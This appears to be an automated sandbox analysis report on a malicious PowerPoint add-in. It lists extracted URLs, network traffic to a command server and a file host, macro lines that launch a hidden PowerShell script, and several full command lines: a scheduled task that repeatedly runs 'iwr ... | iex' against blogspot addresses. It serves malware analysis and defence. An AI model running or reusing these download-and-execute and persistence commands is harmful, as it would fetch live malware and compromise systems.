          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://officeapps.live.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://onedrive.live.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://onedrive.live.com/embed?
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://osi.office.net
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://otelrules.azureedge.net
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://outlook.office.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://outlook.office.com/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://outlook.office365.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://outlook.office365.com/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
          Source: PowerShell_transcript.651689.x22XD8Wy.20220114122042.txt.22.drString found in binary or memory: https://p26ynn.blogspot.com/atom.xml
          Source: PowerShell_transcript.651689.TDo_fU7j.20220114122054.txt.27.drString found in binary or memory: https://p6tbbb.blogspot.com/atom.xml
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://pages.store.office.com/review/query
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://powerlift.acompli.net
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://roaming.edog.
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://settings.outlook.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://shell.suite.office.com:1443
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://skyapi.live.net/Activity/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://staging.cortana.ai
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://store.office.cn/addinstemplate
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://store.office.de/addinstemplate
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://tasks.office.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://web.microsoftstream.com/video/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://webshell.suite.office.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://wus2.contentsync.
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://wus2.pagecontentsync.
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://www.odwebp.svc.ms
          Source: aspnet_compiler.exe, 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
          Source: unknownHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 282Expect: 100-continueConnection: Keep-Alive
          Source: unknownDNS traffic detected: queries for: www.j.mp
          Source: global trafficHTTP traffic detected: GET /file/nm9ysba5ejf20r8/6.dll/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.mediafire.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /rm83e8erdqxg/nm9ysba5ejf20r8/6.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: download2262.mediafire.comCookie: ukey=izna1o17t8hk2hcl41rskil668flg4w4Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: p6tbbb.blogspot.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: p26ynn.blogspot.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /file/5avuvurhf9r42y3/6.dll/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.mediafire.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /ugd/5940e4_979408a19b03449f8221c8f8d235fa55.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /u45xa78x9nkg/5avuvurhf9r42y3/6.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: download2262.mediafire.comCookie: ukey=8gv80wkxqbda9mv7zrd52a2eanmh8cy0Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: p6tbbb.blogspot.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /file/5avuvurhf9r42y3/6.dll/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.mediafire.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /1rxjqgtrygkg/5avuvurhf9r42y3/6.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: download2262.mediafire.comCookie: ukey=s7huv8g43j1r0etull8h9ns6aiwyny7lConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /asasdjiasjdiasjasdasddik HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.j.mpConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /asasdjiasjdiasjasdasddik HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bit.lyConnection: Keep-Alive

          System Summary:

          barindex
          Document contains an embedded VBA macro which may execute processesShow sources
          Source: ~DF85570804A0D29ED2.TMP.7.drOLE, VBA macro line: GetObject("new:13709620-C279-11CE-A49E-444553540000").Shellexecute ca.lc.Tag, jojo.jiji.Tag + jiajsijasd, "" , StrReverse("n" + "e" + "p" + "o"), 0
          Document contains an embedded VBA macro with suspicious stringsShow sources
          Source: ~DF85570804A0D29ED2.TMP.7.drOLE, VBA macro line: jiajsijasd = "C:\Users\" & Environ("UserName") & "\Pictures\notnice" + "." + "ps1"
          Source: ~DF85570804A0D29ED2.TMP.7.drOLE, VBA macro line: GetObject("new:13709620-C279-11CE-A49E-444553540000").Shellexecute ca.lc.Tag, jojo.jiji.Tag + jiajsijasd, "" , StrReverse("n" + "e" + "p" + "o"), 0
          Source: ~DF85570804A0D29ED2.TMP.7.drOLE, VBA macro line: Sub Auto_Open()
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeCode function: 31_2_0134B0BA NtQuerySystemInformation,31_2_0134B0BA
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeCode function: 31_2_0134B089 NtQuerySystemInformation,31_2_0134B089
          Source: ~DF85570804A0D29ED2.TMP.7.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: POWERPNT.box.7.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: ~DF9BC36A1CA590193F.TMP.7.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
          Source: ~DF85570804A0D29ED2.TMP.7.drOLE indicator, VBA macros: true
          Source: 3.ppamReversingLabs: Detection: 25%
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE "C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" /AUTOMATION -Embedding
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\Desktop\3.ppam"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\3.ppam" /ou "
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p26ynn.blogspot.com/atom.xml" -useB|iex;
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p6tbbb.blogspot.com/atom.xml" -useB|iex;
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p6tbbb.blogspot.com/atom.xml" -useB|iex;
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\3.ppam" /ou "Jump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeCode function: 31_2_0134AF3E AdjustTokenPrivileges,31_2_0134AF3E
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeCode function: 31_2_0134AF07 AdjustTokenPrivileges,31_2_0134AF07
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEFile created: C:\Users\user\AppData\Local\Temp\{CB4D47A4-9AA7-472C-ACE9-B71CE8A887CE} - OProcSessId.datJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winPPAM@27/30@17/9
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3860:120:WilError_01
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2924:120:WilError_01
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEWindow found: window name: SysTabControl32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
          Source: POWERPNT.box.7.drInitial sample: OLE indicators vbamacros = False
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeCode function: 31_2_01343265 push edi; ret 31_2_01343266
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeCode function: 31_2_01343169 push edi; ret 31_2_0134316A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeCode function: 31_2_01342815 push eax; ret 31_2_01342816
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeCode function: 31_2_01342C10 push eax; ret 31_2_01342C12
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeCode function: 31_2_0134285D push edi; ret 31_2_0134285E
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeCode function: 31_2_0134288D push esi; ret 31_2_0134288E
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeCode function: 31_2_01342808 push ecx; ret 31_2_0134280A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeCode function: 31_2_01342689 push edi; ret 31_2_0134268A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeCode function: 31_2_030F4E70 pushad ; iretd 31_2_030F4E71

